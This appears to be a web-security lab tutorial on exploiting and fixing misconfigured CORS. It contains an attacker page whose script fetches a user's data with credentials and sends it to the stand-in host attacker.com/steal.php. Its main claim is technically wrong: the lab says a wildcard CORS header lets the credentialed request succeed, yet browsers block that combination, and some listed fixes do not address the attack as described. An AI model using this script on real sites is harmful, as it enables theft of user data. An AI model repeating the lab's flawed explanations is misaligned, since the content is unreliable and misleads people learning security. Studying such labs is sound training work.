Objective
Learn how to exploit Misconfigured Cross-Origin Resource Sharing (CORS) headers to bypass the Same-Origin Policy and steal sensitive data. Understand how to mitigate this vulnerability by implementing secure CORS configurations.
Scenario
You are testing a web application that exposes sensitive data through an API endpoint. Due to a misconfigured CORS policy (e.g., Access-Control-Allow-Origin: *), an attacker can craft malicious web pages to send authenticated requests to the vulnerable server and steal sensitive data from legitimate users.
Lab Setup
Prerequisites:
- Basic knowledge of JavaScript, HTTP requests, and CORS.
- XAMPP/LAMP/WAMP stack installed (or any web server with PHP support).
- A code editor (e.g., VSCode, Sublime Text).
Step 1: Create the Vulnerable Web Application
- PHP Script with Misconfigured CORS
- Create a file
data.php:<?php header("Access-Control-Allow-Origin: *"); header("Content-Type: application/json"); $data = [ "username" => "alice", "email" => "[email protected]", "balance" => 5000 ]; echo json_encode($data); ?>
- Create a file
- Running the Application
- Start the Apache server.
- Place
data.phpin the web server’s root directory (htdocsfor XAMPP). - Open
http://localhost/data.phpin your browser to verify the JSON response.
- Attacker’s Malicious Web Page
- Create a file
malicious.htmlto simulate an attack:<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Malicious Page</title> </head> <body> <h2>Loading... Please wait</h2> <script> fetch('http://localhost/data.php', { credentials: 'include' }) .then(response => response.json()) .then(data => { fetch('http://attacker.com/steal.php?data=' + JSON.stringify(data)); }); </script> </body> </html>
- Create a file
Exploitation Steps
Step 1: Exploiting Misconfigured CORS
- Open
malicious.htmlin the attacker’s domain or locally. - The malicious script sends a cross-origin request to
http://localhost/data.php. - The browser allows the request because of the wildcard CORS policy (
Access-Control-Allow-Origin: *). - The sensitive data is sent to the attacker’s server (
http://attacker.com/steal.php).
Expected Result:
- The attacker successfully retrieves sensitive user data from the vulnerable server.
Solution and Prevention
Problem Analysis
- The server allows requests from any origin due to
Access-Control-Allow-Origin: *.
Fixing the Vulnerability
- Restrict Allowed Origins
- Specify trusted domains in the CORS header:
$allowed_origins = ['https://trustedsite.com']; if (in_array($_SERVER['HTTP_ORIGIN'], $allowed_origins)) { header("Access-Control-Allow-Origin: {$_SERVER['HTTP_ORIGIN']}"); } header("Content-Type: application/json");
- Specify trusted domains in the CORS header:
- Avoid Wildcards with Credentials
- Do not use
*whenAccess-Control-Allow-Credentials: trueis set:header("Access-Control-Allow-Credentials: true"); header("Access-Control-Allow-Origin: https://trustedsite.com");
- Do not use
- Validate Authentication on Sensitive Endpoints
- Require authentication tokens or session validation for sensitive data access.
- Use Preflight Requests for Sensitive Actions
- Enforce preflight checks (
OPTIONSmethod) for state-changing requests.
- Enforce preflight checks (
- Implement Content Security Policy (CSP)
- Restrict where scripts can be loaded from:
header("Content-Security-Policy: default-src 'self';");
- Restrict where scripts can be loaded from:
Testing After Fix
- Reload
malicious.htmlafter applying the fix. - Expected Result:
- The browser blocks the cross-origin request due to the restricted CORS policy.
- No data is sent to the attacker.
Conclusion
In this lab, you exploited Misconfigured CORS to perform unauthorized cross-origin requests and steal sensitive data. You also learned how to mitigate this risk by restricting allowed origins, validating authentication, and properly configuring CORS headers.
0 Comments